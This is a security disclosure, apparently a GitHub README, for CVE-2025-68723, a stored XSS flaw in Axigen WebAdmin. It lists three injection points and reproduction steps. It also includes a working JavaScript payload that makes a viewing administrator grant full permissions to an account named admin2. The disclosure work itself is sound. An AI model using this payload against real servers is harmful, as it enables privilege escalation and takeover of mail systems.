# CVE-2025-68723: Axigen WebAdmin Stored XSS

### Vulnerability Summary

Multiple input fields within the Axigen WebAdmin interface lack proper sanitization, allowing for the execution of malicious JavaScript. These vulnerabilities enable a low-privileged administrator (or an attacker leveraging [Broken Access Control](https://github.com/osmancanvural/CVE-2025-68721)) to execute arbitrary code in the context of a high-privileged administrator, leading to full privilege escalation.

**Affected Versions:** < 10.6.26

For more info, see the [Axigen Knowledge Base](https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Stored-XSS-Vulnerabilities-CVE-2025-68723-_408.html).

---

### POC

I detected 3 different instances of Stored XSS:

1. **Logging > Local Services Log:** Injecting a payload into a log file name. This one have limitations due to character length limit of a log file name.
2. **Security & Filtering > SSL Certificates:** Injecting a payload into a `.pem` certificate file.
3. **Services > Webmail > Listeners:** Injecting a payload into the Certificate File name field.

**Example Payload:**

```html
<img src=x onerror="u=location.search+'&page=ausrpr&action=add&name=admin2';['Processing','Log','DNR','SMTPIn','SMTPOut','POP3','IMAP','WebMail','RPOP','POP3Proxy','IMAPProxy','WebmailProxy','CLI','WebAdmin','FTPBackup','Reporting'].forEach(p=>u+='&manage'+p+'=manage'+p);u+='&accessDumpData=accessDumpData&quick-add=Quick+Add&permType=manageServices&permAction=grant&servAction=grant';location.search=u">

```


**Payload Explanation:**

The payload you see above will grant all permissions to account named admin2.

### Steps to Reproduce:

1. **Injection:** Navigate to any of the affected components (e.g., **Security & Filtering > SSL Certificates**).
2. **Execution:** Rename a log file or upload a certificate containing the malicious payload. (I've added a certificate file containing the 'Example Payload')
3. **Trigger:** When a high-privileged administrator views the log list or clicks **"View Usage"** on the malicious certificate, the script executes.

---

### Impact

* **Privilege Escalation:** A low-privileged admin can gain full system control by targeting a high-privileged admin and perform actions on behalf of other administrators.
  
---
